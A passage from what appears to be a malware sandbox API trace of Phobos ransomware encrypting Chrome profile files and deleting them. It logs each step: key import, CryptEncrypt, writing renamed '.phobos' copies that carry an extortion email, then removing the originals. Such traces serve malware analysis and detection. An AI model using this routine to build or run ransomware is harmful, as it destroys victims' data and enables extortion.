pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.845] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=154) returned 1 [0184.845] CloseHandle (hObject=0x134) returned 1 [0184.845] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log")) returned 0x2020 [0184.845] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.845] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.845] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.845] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.845] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.845] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.846] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.846] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x9a, lpOverlapped=0x0) returned 1 [0184.846] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa0, dwBufLen=0xa0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa0) returned 1 [0184.846] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xa0, lpOverlapped=0x0) returned 1 [0184.847] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0184.847] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.847] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0184.847] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.847] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0184.847] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.847] CloseHandle (hObject=0x134) returned 1 [0184.847] CloseHandle (hObject=0x178) returned 1 [0184.847] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log")) returned 1 [0184.848] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.848] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\manifest-000001"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.849] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=41) returned 1 [0184.849] CloseHandle (hObject=0x178) returned 1 [0184.849] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\manifest-000001")) returned 0x2020 [0184.849] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\manifest-000001.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.849] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.849] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\manifest-000001.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.849] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.849] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.849] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x29, lpOverlapped=0x0) returned 1 [0184.850] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0184.850] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x30, lpOverlapped=0x0) returned 1 [0184.851] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0184.851] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.851] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0184.851] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.851] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0184.851] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.851] CloseHandle (hObject=0x178) returned 1 [0184.851] CloseHandle (hObject=0x134) returned 1 [0184.852] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\manifest-000001")) returned 1 [0184.853] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\current"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.854] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=16) returned 1 [0184.854] CloseHandle (hObject=0x134) returned 1 [0184.854] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\current")) returned 0x2020 [0184.854] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\current.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.854] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.854] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.854] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\current.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.855] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.855] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.855] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x10, lpOverlapped=0x0) returned 1 [0184.856] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20, dwBufLen=0x20 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20) returned 1 [0184.856] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x20, lpOverlapped=0x0) returned 1 [0184.856] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0184.856] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.856] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0184.856] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.857] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0184.857] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.857] CloseHandle (hObject=0x134) returned 1 [0184.857] CloseHandle (hObject=0x178) returned 1 [0184.857] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\current")) returned 1 [0184.860] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.860] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\lock"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.861] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0184.861] CloseHandle (hObject=0x178) returned 1 [0184.861] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.861] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=154) returned 1 [0184.861] CloseHandle (hObject=0x178) returned 1 [0184.862] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log")) returned 0x2020 [0184.862] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.862] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.862] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.862] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.862] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.862] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x9a, lpOverlapped=0x0) returned 1 [0184.863] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa0, dwBufLen=0xa0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa0) returned 1 [0184.863] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xa0, lpOverlapped=0x0) returned 1 [0184.864] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0184.864] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.864] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0184.864] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.864] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0184.864] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.864] CloseHandle (hObject=0x178) returned 1 [0184.864] CloseHandle (hObject=0x134) returned 1 [0184.864] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log")) returned 1 [0184.865] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.865] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\manifest-000001"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.865] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=41) returned 1 [0184.865] CloseHandle (hObject=0x134) returned 1 [0184.865] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\manifest-000001")) returned 0x2020 [0184.865] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\manifest-000001.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.866] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.866] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.866] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.866] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\manifest-000001.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.866] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.866] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.866] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x29, lpOverlapped=0x0) returned 1 [0184.867] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0184.867] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x30, lpOverlapped=0x0) returned 1 [0184.868] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0184.868] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.868] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0184.868] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.868] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0184.868] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.868] CloseHandle (hObject=0x134) returned 1 [0184.868] CloseHandle (hObject=0x178) returned 1 [0184.868] DeleteFileW 